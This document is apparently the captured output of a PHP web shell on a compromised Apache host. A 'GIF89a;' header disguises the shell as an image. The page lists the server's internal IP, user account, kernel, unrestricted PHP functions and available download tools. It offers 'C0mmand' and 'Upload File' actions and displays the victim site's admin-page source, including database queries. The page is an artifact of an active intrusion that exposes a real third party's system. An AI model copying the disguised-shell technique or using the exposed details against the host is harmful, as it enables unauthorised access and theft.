GIF89a;
Server IP : 172.26.0.195 / Your IP : 3.15.141.155 Web Server : Apache System : Linux 43-205-77-33.cprapid.com 3.10.0-1160.119.1.el7.tuxcare.els2.x86_64 #1 SMP Mon Jul 15 12:09:18 UTC 2024 x86_64 User : jnclnmuac ( 1026) PHP Version : 8.0.30 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/jnclnmuac/public_html/web/../web/css/../cgi-bin/../admin/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php include 'headerck.php';?> <div class="page-header page-header-light"> <div class="breadcrumb-line breadcrumb-line-light header-elements-md-inline"> <div class="d-flex"> <div class="breadcrumb"> <a href="#" class="breadcrumb-item"><i class="icon-stack"></i>Mange Committees Cells </a> <span class="breadcrumb-item active">Committees Cells</span> </div> <a href="#" class="header-elements-toggle text-default d-md-none"><i class="icon-more"></i></a> </div> </div> </div> <!-- /page header --> <?php include("connection.php"); $sql="select * from commitee_cell where flag='pcl'"; $query_run=mysqli_query($dbCon, $sql); $result=mysqli_num_rows($query_run); if($result>0) { while($row=mysqli_fetch_array($query_run)) {?> <form action="all.php" method="POST"> <textarea name="editor" id="editor" cols="30" rows="10"> <?php echo $row['p_msg'] ?> </textarea><br> <input type="submit" name="pcl_update" value="Update Content" class="btn-success"> </form> <?php } } //} ?> <?php include 'footerck.php';?>